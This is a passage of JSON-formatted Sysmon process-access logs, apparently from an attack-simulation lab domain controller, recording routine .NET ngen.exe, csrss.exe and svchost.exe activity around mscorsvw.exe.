C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.558","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-00109DF20C00}","TargetProcessId":"1528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6703,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.558\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-00109DF20C00}\r\nTargetProcessId: 1528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.558","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-00109DF20C00}","TargetProcessId":"1528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6704,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.573\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-00109DF20C00}\r\nTargetProcessId: 1528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.573","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-00109DF20C00}","TargetProcessId":"1528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6705,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.620\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010DFF50C00}\r\nTargetProcessId: 3024\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.620","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010DFF50C00}","TargetProcessId":"3024","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6706,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.620\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010DFF50C00}\r\nTargetProcessId: 3024\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.620","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010DFF50C00}","TargetProcessId":"3024","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6707,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.636\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010DFF50C00}\r\nTargetProcessId: 3024\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.636","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010DFF50C00}","TargetProcessId":"3024","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6708,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.667\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010FEF80C00}\r\nTargetProcessId: 600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.667","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010FEF80C00}","TargetProcessId":"600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6709,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.667\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010FEF80C00}\r\nTargetProcessId: 600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.667","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010FEF80C00}","TargetProcessId":"600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
